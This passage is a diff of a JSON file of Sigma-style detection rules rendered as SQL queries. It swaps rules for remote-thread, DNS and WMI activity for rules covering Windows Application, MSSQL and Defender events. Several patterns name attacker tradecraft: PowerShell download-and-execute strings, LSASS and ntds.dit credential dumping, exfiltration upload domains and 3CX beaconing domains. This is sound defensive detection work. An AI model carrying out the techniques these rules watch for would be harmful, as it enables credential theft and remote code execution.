"Ntdsutil Abuse", + "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_target.yml" + "filename": "win_esent_ntdsutil_abuse.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", + "status": "experimental", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0005", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Antivirus products" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "author": "frack113", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", "attack.defense_evasion", - "attack.t1127" + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1055" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "status": "experimental", + "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "status": "experimental", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", - "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Backup Catalog Deleted", + "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "status": "test", + "description": "Detects backup catalog deletions", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_susp_backup_delete.yml" }, { - "title": "WMI Event Subscription", - "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", - "status": "test", - "description": "Detects creation of WMI event subscription persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.execution" ], "falsepositives": [ - "Exclude legitimate (vetted) use of WMI event subscription in your network" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE EventID IN ('19', '20', '21')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_event_subscription.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrative scripts" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "status": "experimental", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Legitimate use of the feature by administrators (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", + "status": "experimental", + "description": "Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", - "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "Suspicious LDAP Domain Access", - "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "status": "experimental", - "description": "Detect suspicious LDAP request from non-Windows application", - "author": "frack113", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Programs that also lookup the observed domain" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_susp_ldap.yml" + "filename": "win_defender_alert_lsass_access.yml" 